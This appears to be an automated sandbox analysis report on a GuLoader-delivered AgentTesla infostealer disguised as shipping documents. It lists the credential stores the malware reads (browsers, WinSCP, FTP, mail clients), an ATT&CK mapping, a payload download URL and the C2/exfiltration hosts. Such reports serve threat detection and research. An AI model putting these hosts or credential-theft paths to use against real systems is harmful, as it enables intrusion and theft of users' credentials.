            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 4232, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 4232, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 4232, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		3
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		1
            Obfuscated Files or Information            		1
            Credentials in Registry            		126
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
            Process Injection            		1
            Software Packing            		Security Account Manager311
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model1
            Clipboard Data            		13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets141
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518330 Sample: Shipping documents 00002299... Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 27 ftp.concaribe.com 2->27 29 concaribe.com 2->29 31 api.ipify.org 2->31 47 Found malware configuration 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for dropped file 2->51 53 7 other signatures 2->53 8 Shipping documents 000022999878999800009999.exe 1 29 2->8         started        signatures3 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 11 powershell.exe 20 8->11         started        process6 file7 23 Shipping documents...878999800009999.exe, PE32 11->23 dropped 25 Shipping documents...exe:Zone.Identifier, ASCII 11->25 dropped 55 Writes to foreign memory regions 11->55 57 Found suspicious powershell code related to unpacking or dynamic code loading 11->57 59 Powershell drops PE file 11->59 15 wabmig.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 33 concaribe.com 192.185.13.234, 21, 49722 UNIFIEDLAYER-AS-1US United States 15->33 35 185.29.11.53, 49720, 80 DATACLUB-NL European Union 15->35 37 api.ipify.org 104.26.13.205, 443, 49721 CLOUDFLARENETUS United States 15->37 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->39 41 Tries to steal Mail credentials (via file / registry access) 15->41 43 Tries to harvest and steal ftp login credentials 15->43 45 Tries to harvest and steal browser information (history, passwords, etc) 15->45 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Shipping documents 000022999878999800009999.exe26%ReversingLabsWin32.Trojan.Guloader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe26%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://185.29.11.53/bgJJbKBK219.bin-0%Avira URL Cloudsafe
            https://go.micXO0%Avira URL Cloudsafe
            http://crl.micro0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            http://185.29.11.53/bgJJbKBK219.bine0%Avira URL Cloudsafe
            http://185.29.11.53/bgJJbKBK219.bin0%Avira URL Cloudsafe
            http://concaribe.com0%Avira URL Cloudsafe
            http://ftp.concaribe.com100%Avira URL Cloudmalware
            https://api.ipify.org/t0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            		104.26.13.205
            		truefalse
              		unknown
              concaribe.com
              		192.185.13.234
              		truetrue
                		unknown
                ftp.concaribe.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                  • URL Reputation: safe
                  		unknown
                  http://185.29.11.53/bgJJbKBK219.binfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://go.micXOpowershell.exe, 00000002.00000002.2775532254.0000000006D12000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.ipify.orgwabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://185.29.11.53/bgJJbKBK219.bin-wabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.micropowershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2775532254.0000000006C59000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://185.29.11.53/bgJJbKBK219.binewabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ftp.concaribe.comwabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://nsis.sf.net/NSIS_ErrorErrorShipping documents 000022999878999800009999.exe, 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Shipping documents 000022999878999800009999.exe, 00000000.00000000.2125866362.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://concaribe.comwabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org/twabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.29.11.53
                  		unknownEuropean Union
                  		203557DATACLUB-NLfalse
                  104.26.13.205
                  		api.ipify.orgUnited States
                  		13335CLOUDFLARENETUSfalse
                  192.185.13.234
                  		concaribe.comUnited States
                  		46606UNIFIEDLAYER-AS-1UStrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518330
                  Start date and time:2024-09-25 15:58:09 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Shipping documents 000022999878999800009999.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@6/12@2/3
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 140
                  • Number of non-executed functions: 30
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 5008 because it is empty
                  • Execution Graph export aborted for target wabmig.exe, PID 4232 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: Shipping documents 000022999878999800009999.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  09:59:03API Interceptor39x Sleep call for process: powershell.exe modified
                  10:00:09API Interceptor55621x Sleep call for process: wabmig.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.29.11.53Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.53/bIGuEflfnZjESw74.bin
                  Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.53/bIGuEflfnZjESw74.bin
                  104.26.13.205file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/
                  file.exeGet hashmaliciousLummaC, VidarBrowse
                  • api.ipify.org/
                  fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                  • api.ipify.org/
                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                  • api.ipify.org/
                  vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                  • api.ipify.org/
                  SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                  • api.ipify.org/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  api.ipify.orgz38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                  • 172.67.74.152
                  z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                  • 172.67.74.152
                  Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 172.67.74.152
                  Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 104.26.13.205
                  rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.13.205
                  https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                  • 104.26.13.205
                  Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                  • 104.26.12.205
                  reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                  • 104.26.13.205
                  COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                  • 104.26.12.205
                  http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                  • 104.26.12.205

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSEFT Remittance - 25_09_24 Ref_3c70ac202caa933179b3568afa512866a7bd5171.emlGet hashmaliciousUnknownBrowse
                  • 104.17.25.14
                  z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 188.114.97.3
                  rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                  • 188.114.96.3
                  cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.96.3
                  update.ps1Get hashmaliciousNetSupport RAT, HTMLPhisherBrowse
                  • 104.21.73.126
                  https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1Get hashmaliciousHtmlDropperBrowse
                  • 104.18.94.41
                  hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                  • 188.114.97.3
                  1e#U0414.exeGet hashmaliciousLokibotBrowse
                  • 188.114.96.3
                  wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                  • 188.114.96.3
                  Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.96.3
                  DATACLUB-NLZe1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.53
                  Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.53
                  PO 00009876660887666000.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 84.38.133.121
                  Bankcopyscanneddoc.exeGet hashmaliciousRedLineBrowse
                  • 84.38.129.21
                  xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
                  • 185.29.11.23
                  new.cmdGet hashmaliciousGuLoaderBrowse
                  • 185.29.11.28
                  temp.cmdGet hashmaliciousUnknownBrowse
                  • 185.29.11.28
                  price_request_.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 185.29.11.62
                  disprovable.dllGet hashmaliciousCryptOne, QbotBrowse
                  • 84.38.133.191
                  BL.xlsGet hashmaliciousLokibotBrowse
                  • 84.38.129.114
                  UNIFIEDLAYER-AS-1USrDieselPlantTechnicalSheet.exeGet hashmaliciousDBatLoaderBrowse
                  • 192.185.31.186
                  rPO_CW00402902400429.exeGet hashmaliciousAgentTeslaBrowse
                  • 192.185.35.35
                  Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 192.185.13.234
                  Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                  • 192.185.13.234
                  Audio_Msg..00290663894983Transcript.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 162.215.211.9
                  rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 162.241.27.20
                  Shipping Document.exeGet hashmaliciousAgentTeslaBrowse
                  • 162.214.80.31
                  https://wbh.sxx.temporary.site/Get hashmaliciousUnknownBrowse
                  • 50.6.160.227
                  https://pnp.zfx.mybluehost.me/wp-content/it/web/login.php/Get hashmaliciousUnknownBrowse
                  • 50.6.153.149
                  https://hr.schoolrundriver.com/system/fonts/wordpress/CHASEGet hashmaliciousUnknownBrowse
                  • 192.232.218.112

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0ez84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 104.26.13.205
                  rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                  • 104.26.13.205
                  update.ps1Get hashmaliciousNetSupport RAT, HTMLPhisherBrowse
                  • 104.26.13.205
                  https://1drv.ms/o/s!AnrtiNmLLRZglVBmj_pzjvzIvHZ7?e=WnZeS1Get hashmaliciousHtmlDropperBrowse
                  • 104.26.13.205
                  https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeVGet hashmaliciousUnknownBrowse
                  • 104.26.13.205
                  hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                  • 104.26.13.205
                  wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                  • 104.26.13.205
                  Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 104.26.13.205
                  http://mir-belting.comGet hashmaliciousUnknownBrowse
                  • 104.26.13.205
                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                  • 104.26.13.205

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
